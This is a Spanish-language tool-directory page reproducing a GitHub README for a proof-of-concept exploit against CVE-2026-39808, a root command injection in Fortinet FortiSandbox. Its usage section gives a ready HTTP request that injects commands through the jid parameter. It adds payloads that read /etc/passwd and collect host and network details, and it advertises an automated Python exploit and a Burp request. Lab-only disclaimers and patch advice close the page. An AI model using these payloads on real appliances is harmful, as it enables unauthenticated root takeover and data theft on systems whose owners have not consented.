Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39808 — CVE-2026-39808 | Kitploit
Herramientas/GitHubGitHub/0xblackash/cve-2026-39808
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica
GitHub0xblackash/cve-2026-39808

CVE-2026-39808

CVE-2026-39808

Ver Repositorio
22hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 Escape de Sandbox Root en FortiSandbox - CVE-2026-39808

1765359501378
Status CVE Affected Versions

🎯 Descripción general

Este repositorio contiene un Proof of Concept limpio y bien documentado para CVE-2026-39808 — una vulnerabilidad crítica de inyección de comandos sin autenticación en Fortinet FortiSandbox que permite el escape de sandbox y la ejecución remota de código como root (uid=0).

Qué demuestra este PoC:

  • Path Traversal + inyección de comandos a través del parámetro jid
  • Escape de la sandbox del entorno de análisis
  • Ejecución de comandos arbitrarios con privilegios de root
  • Lectura de archivos del sistema e información de red

📸 Demo

CVE-2026-39808 1 CVE-2026-39808 0 CVE-2026-39808 3 CVE-2026-39808 2 CVE-2026-39808 4

Explotación exitosa mostrando uid=0 gid=0 groups=0


🚀 Versiones Afectadas

Rango de VersionesEstado
FortiSandbox 4.4.0 – 4.4.8Vulnerable
FortiSandbox 5.0.0 – 5.0.5Vulnerable
4.4.9+ / 5.0.6+Parcheada

🛠️ Cómo Usarlo (Solo Laboratorio)

1. Payload Simple (Recomendado)

root@kitploit:~
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip

2. Ver el resultado

Abrir en el navegador:

root@kitploit:~
https://your-lab-ip/ng/out.txt

3. Ejemplos de Payloads Avanzados

root@kitploit:~
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|

📁 Contenido del Repositorio

  • poc.py → Exploit automatizado en Python
  • burp-request.txt → Petición de Burp Suite lista para usar
  • payloads.md → Colección de payloads útiles
  • screenshots/ → Imágenes de explotación paso a paso
  • README.md → Este archivo

⚠️ Notas Importantes

  • Solo para fines educativos y de laboratorio
  • NO lo utilices en sistemas de producción o sistemas no autorizados
  • Obtén siempre el permiso adecuado antes de realizar pruebas
  • Actualiza tu FortiSandbox a la versión 4.4.9+ o 5.0.6+

🛡️ Mitigación

Actualiza FortiSandbox de inmediato a una de las siguientes versiones:

  • 4.4.9 o superior
  • 5.0.6 o superior

Fortinet ha publicado parches oficiales que solucionan esta vulnerabilidad.


Hecho con fines de investigación y aprendizaje
⭐ ¡Dale una estrella a este repositorio si te ayudó!

Descargar herramienta